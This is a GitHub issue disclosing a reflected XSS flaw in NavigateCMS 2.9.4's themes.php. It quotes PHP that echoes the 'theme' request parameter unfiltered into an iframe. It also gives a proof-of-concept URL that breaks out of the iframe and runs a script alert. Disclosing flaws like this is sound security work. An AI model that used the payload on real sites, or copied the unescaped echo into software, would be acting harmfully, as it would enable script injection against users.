navigate\lib\packages\themes\themes.php line17 without any filter.
case 'theme_info':
echo'<iframe src="'.NAVIGATE_URL.'/themes/'.$_REQUEST['theme'].'/'.$_REQUEST['theme'].'.info.html'.'" scrolling="auto" frameborder="0" width="100%" height="100%"></iframe>';
core_terminate();
break;
The text was updated successfully, but these errors were encountered:
bkfish
changed the title
Reflected XSS attack in \lib\packages\themes\themes.php with the theme parameter in NavigateCMS 2.9
Reflected XSS attack in \lib\packages\themes\themes.php with the theme parameter in NavigateCMS 2.9.4
Nov 25, 2021
EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature.
exp
/navigate/navigate.php?fid=themes&act=theme_info&theme=%22%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3Eanalysis
navigate\lib\packages\themes\themes.php line17 without any filter.
The text was updated successfully, but these errors were encountered: